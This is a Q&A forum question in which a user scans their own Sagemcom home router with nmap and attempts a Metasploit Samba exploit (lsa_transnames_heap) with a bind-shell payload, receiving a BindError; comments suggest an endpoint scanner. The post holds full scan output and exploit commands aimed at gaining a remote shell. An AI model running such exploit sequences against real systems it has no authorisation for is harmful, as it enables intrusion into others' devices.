5

I'm trying to gain shell access to my home router/gateway, so I decided to use metasploit and nmap to find if there were any vulnerabilities that I could use:

[marcel@GLaDOS ~]$ sudo nmap -sS -Pn -A 192.168.2.1

Starting Nmap 7.50 ( https://nmap.org ) at 2017-06-21 14:30 EDT
Nmap scan report for mynetwork (192.168.2.1)
Host is up (0.012s latency).
Not shown: 844 closed ports, 148 filtered ports
PORT      STATE SERVICE     VERSION
53/tcp    open  domain      dnsmasq 2.55
| dns-nsid: 
|_  bind.version: dnsmasq-2.55
80/tcp    open  http        lighttpd
|_http-server-header: HTTP Server
|_http-title: Site doesn't have a title (text/html).
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    lighttpd
|_http-server-header: HTTP Server
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=self-signedKey/organizationName=Sagemcom Ca/countryName=FR
| Not valid before: 2011-10-14T12:32:29
|_Not valid after:  2111-09-20T12:32:29
|_ssl-date: 2017-06-21T18:33:31+00:00; +14s from scanner time.
445/tcp   open  netbios-ssn Samba smbd 3.0.24 (workgroup: WORKGROUP)
1080/tcp  open  socks?
| fingerprint-strings: 
|   GenericLines, HTTPOptions, RTSPRequest, SIPOptions, Socks5: 
|     HTTP/1.1 200 BAD_REQUEST_400
|     Server: CPE-iTrace-Server-1.7b
|     Content-Type: text/html
|     Transfer-Encoding: chunked
|_    Connection: close
9000/tcp  open  upnp        TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0)
49152/tcp open  upnp        Portable SDK for UPnP devices 1.6.18 (Linux 2.6.28.8; UPnP 1.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1080-TCP:V=7.50%I=7%D=6/21%Time=594ABB6A%P=x86_64-unknown-linux-gnu
SF:%r(GenericLines,88,"HTTP/1\.1\x20200\x20BAD_REQUEST_400\r\nServer:\x20C
SF:PE-iTrace-Server-1\.7b\r\nContent-Type:\x20text/html\r\nTransfer-Encodi
SF:ng:\x20chunked\r\nConnection:\x20close\r\n\r\n")%r(Socks5,88,"HTTP/1\.1
SF:\x20200\x20BAD_REQUEST_400\r\nServer:\x20CPE-iTrace-Server-1\.7b\r\nCon
SF:tent-Type:\x20text/html\r\nTransfer-Encoding:\x20chunked\r\nConnection:
SF:\x20close\r\n\r\n")%r(HTTPOptions,88,"HTTP/1\.1\x20200\x20BAD_REQUEST_4
SF:00\r\nServer:\x20CPE-iTrace-Server-1\.7b\r\nContent-Type:\x20text/html\
SF:r\nTransfer-Encoding:\x20chunked\r\nConnection:\x20close\r\n\r\n")%r(RT
SF:SPRequest,88,"HTTP/1\.1\x20200\x20BAD_REQUEST_400\r\nServer:\x20CPE-iTr
SF:ace-Server-1\.7b\r\nContent-Type:\x20text/html\r\nTransfer-Encoding:\x2
SF:0chunked\r\nConnection:\x20close\r\n\r\n")%r(SIPOptions,88,"HTTP/1\.1\x
SF:20200\x20BAD_REQUEST_400\r\nServer:\x20CPE-iTrace-Server-1\.7b\r\nConte
SF:nt-Type:\x20text/html\r\nTransfer-Encoding:\x20chunked\r\nConnection:\x
SF:20close\r\n\r\n");
MAC Address: 40:F2:01:EE:09:CD (Sagemcom Broadband SAS)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:   
OS:SCAN(V=7.50%E=4%D=6/21%OT=53%CT=135%CU=32451%PV=Y%DS=1%DC=D%G=Y%M=40F201
OS:%TM=594ABC0C%P=x86_64-unknown-linux-gnu)SEQ(SP=C7%GCD=1%ISR=D3%TI=Z%CI=Z
OS:%TS=U)SEQ(SP=C6%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=U)OPS(O1=M5B4NNSNW4%O2=M5
OS:B4NNSNW4%O3=M5B4NW4%O4=M5B4NNSNW4%O5=M5B4NNSNW4%O6=M5B4NNS)WIN(W1=16D0%W
OS:2=16D0%W3=16D0%W4=16D0%W5=16D0%W6=16D0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NN
OS:SNW4%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T
OS:=40%W=16D0%S=O%A=S+%F=AS%O=M5B4NNSNW4%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A
OS:=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:linux:linux_kernel:2.6.28.8

Host script results:
|_clock-skew: mean: 13s, deviation: 0s, median: 13s
|_nbstat: NetBIOS name: SAGEMCOM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.24)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-06-21T14:33:31-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT      ADDRESS
1   12.11 ms mynetwork (192.168.2.1)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.68 seconds

I found out that the router is running linux and using Samba 3.0.24, which is fairly old. I then found this metasploit exploit which I thought could work: https://www.exploit-db.com/exploits/16859/

msf > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.2.1
RHOST => 192.168.2.1
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] 192.168.2.1:445 - Creating nop sled....
[*] 192.168.2.1:445 - Trying to exploit Samba with address 0xffffe410...
[*] 192.168.2.1:445 - Connecting to the SMB service...
[*] 192.168.2.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.2.1[\lsarpc] ...
[-] 192.168.2.1:445 - Exploit failed: Rex::Proto::DCERPC::Exceptions::BindError Failed to bind. Could not bind to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.2.1[\lsarpc]
[*] Exploit completed, but no session was created.

Unfortunately, I'm getting a BindError, and I can't seem to figure out the problem. If anybody could help me fix it or understand it further, that would be great!

schroeder
  • 123,438
  • 55
  • 284
  • 319
marceloneil
  • 151
  • 1
  • 3
  • 1
    The device don't have the required dcerpc endpoint you are trying to connect. Use auxiliary/scanner/dcerpc/endpoint_mapper on the device and it is doing to show you all the endpoints you can bind. You will see that there won't be any 12345778-1234-abcd-ef00-0123456789ab endpoint available for binding. – void_in Jun 21 '17 at 20:48
  • 1
    Thanks for the suggestion! However, with that I'm getting the error `Could not obtain the endpoint list: Invalid packet. DCERPC response packet is incomplete` for port `139` and `445` on host `192.168.2.1`. Should I be using another post? – marceloneil Jun 22 '17 at 21:02

0 Answers0